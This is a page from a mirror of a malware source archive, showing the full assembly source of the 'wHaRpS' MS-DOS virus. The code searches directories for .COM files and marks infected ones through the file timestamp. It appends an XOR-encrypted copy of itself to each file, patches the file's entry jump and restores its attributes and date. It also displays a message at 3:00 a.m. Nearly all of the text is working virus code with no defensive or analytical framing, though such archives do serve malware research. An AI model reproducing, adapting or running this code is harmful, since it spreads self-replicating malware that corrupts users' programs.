Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
Code Releases Activity
b48fb3cb6c
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Wharps.asm
vxunderground 8c9f96fc5f mov fix
2022-08-21 04:30:30 -05:00

337 lines
9.7 KiB
NASM
Raw Blame History

; "One must crawl before one walks."
; wHaRpS Virus 1.0
; wHaRpS virus of independent virus writer FirstStrike
; For use by [Phalcon\Skism] ONLY!
; Special thanx to:
; Gheap
; Dark Angel
; Demogorgon
name wHaRpS
title
code segment
assume cs:code,ds:code
org 100h
dta equ 65000d ; DTA address to be set
fname equ 65000d + 1eh ; DTA - file name
ftime equ 65000d + 16h ; DTA - file time
fsize equ 65000d + 1ah ; DTA - file size
orgdir equ 65400d ; original path storage
date equ 65300d ; store file date
time equ 65302d ; store file time
attrib equ 65304d ; store file attrib
err1 equ 65306d ; old error handler address
err2 equ 65308d ; old error handler address
olddta equ 80h ; original DTA address
begin:
nop
nop
nop
call setup ; find "delta offset"
setup:
pop bp
sub bp, offset setup
jmp main ; DEBUG E8 02 00
nop
jmp main
crypt_em:
xor di,di
lea si, [bp+main]
mov di, si
mov cx, end_crypt - main
xor_loop:
lodsb ; ds:[si] -> al
db 34h ; xor al, XX
encrypt_val db 0 ; Starting encryption value is 0
stosb ; al ->es:[di]
loop xor_loop
ret
main:
xor di,di
mov di,0100h ; Restore first three
lea si,[bp+saveins] ; original program bytes
mov cx,0003d
rep movsb
jmp system_pic ; Take a "picture" of system settings
handler: ; error handler
mov al,0
iret
endp
data label byte
wharps db '[wHaRpS]',0 ; wHaRpS ID
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me
dir_mask db '*.',0 ; dir atrib
allcom db '*.COM',0 ; what to search for
root db '\',0 ; root
saveins db 0e8h,00h,00h ; original three bytes
ultimate dw 0 ; ultimate dir to be reached
current dw 0 ; current dir
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
system_pic: ; SNAP!
mov ah,47h ; get original path
mov dl,0
lea si,cs:orgdir ; store original path
int 21h
crypt_change: ; set crypt value
mov ah,2ch
int 21h
mov [bp+encrypt_val],dl
cmp ch,03
jz more
jmp errorh
more:
cmp cl,00
jz bomb
jmp errorh
bomb:
mov ah,09h
lea dx,[bp+message]
int 21h
mov ah,4ch
int 21h
errorh:
push es ; save original error handler address
mov ax,3524h
int 21h
mov word ptr cs:err1,bx
mov word ptr cs:err2,es
pop es
mov ax,2524h ; set an error handler
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
int 21h
jmp pre_search
drop_to_root: ; subroutine to visit the root
lea dx,[bp+root]
jmp continue
set_path: ; OR set a path
lea dx,cs:fname
continue:
mov ah,3bh
int 21h
ret
return_to_search:
inc [bp+ultimate]
call drop_to_root
mov [bp+current],0000
jmp find_first_dir
pre_search: ; set a DTA
mov dx,dta
mov ah,1ah
int 21h
mov [bp+current],0000 ; zero the counters
mov [bp+ultimate],0000 ; ""
inc [bp+ultimate] ; want to search 1st dir in root
call drop_to_root ; bomb to root
find_first_dir: ; directory searchin'
lea dx,[bp+dir_mask]
mov cx,16
mov ah,4Eh
int 21h
jc almost_done ; no directories?
dir_test:
inc [bp+current] ; directory found - MARK!
mov bx,[bp+current]
cmp word ptr [bp+ultimate],bx ; is it the one we want?
jnz find_next_dir ; no, find another
call set_path ; yes, set the correct path
jmp find_first_file ; find some .COMs
find_next_dir: ; mo' directory searchin'
mov ah,4fh
int 21h
jc almost_done
jmp dir_test ; go see if correct dir found yet
find_first_file: ; file searchin'
lea dx,[bp+allcom]
mov cx,00000001b
mov ah,4Eh
int 21h
jc return_to_search ; no .COM so mo' dir
jmp check_if_ill ; is the file "sick"?
find_next_file: ; keep on a searchin'
mov ah,4fh
int 21h
jc return_to_search ; no more .COM so back
; to the directories
check_if_ill: ; check file's health
mov ax,cs:ftime
and al,11111b ; good, your sick!
cmp al,62d/2 ; (No more 62 seconds as virus
jz find_next_file ; markers! - I swear!)
cmp cs:fsize,60000d ; whoa, file to big!
ja find_next_file ; so, get a new one
cmp cs:fsize,500d ; whoa, file to small!
jb find_next_file ; throw it back and move on
jmp infect ; perfect, for infection
db 'Joy J.',0 ; don't ask
error:
pre_done:
almost_done:
jmp done ; in case of emergency.....
infect:
mov ah,43h ; save original attribute
mov al,00h
lea dx,cs:[fname]
int 21h
mov cs:attrib,cx
jc pre_done
mov ax,4301h ; clear all attributes
and cx,11111110b ; (none shall slow progress)
int 21h
jc pre_done
mov ax,3d02h ; open the file, please
int 21h
jc pre_done
xchg bx,ax
mov ax,5700h ; save the date/time
int 21h
mov cs:time,cx
mov cs:date,dx
jc pre_done
mov ah,3Fh ; read first 3 bytes of file
mov cx,0003h ; to be infected and save
lea dx,[bp+saveins]
int 21h
jc pre_done
mov ax,4202h ; move to end of file
xor cx,cx
xor dx,dx
int 21h
jc pre_done
mov [bp+new_jmp],ax
call crypt_em
end_crypt label byte ; encrypt to here
mov ah,40h
mov cx,endcode-begin
lea dx,[bp+begin]
int 21h ; encrypt n' write virus to end of
jc done ; file
mov ax,4200h ; go to beginning of file
xor cx,cx
xor dx,dx
int 21h
jc done
jmp cont
jmpc db 0e9h
new_jmp dw ?
cont:
mov ah,40h
mov cl,3
lea dx,[bp+jmpc]
int 21h
jc done
attrib_stuff:
mov ax,5701h
mov cx,cs:[time]
mov dx,cs:[date]
or cl,11111b
int 21h
jc done
mov ah,3eh
int 21h
jc done
mov ax,4301h
mov cx,cs:[attrib]
lea dx,cs:[fname]
int 21h
jc done
done:
mov dx,olddta ; restore all changes
mov ah,1ah
int 21h
push ds
mov ax,2524h
lea dx,cs:[err2]
mov ds,dx
lea dx,cs:[err1]
int 21h
pop ds
mov ah,3bh
mov dx,'/'
int 21h
mov ah,3bh
lea dx,cs:[orgdir]
int 21h
xor di,di
mov di,0100h
jmp di ; good_bye
endcode label byte
code ends
end begin
View Git Blame Copy Permalink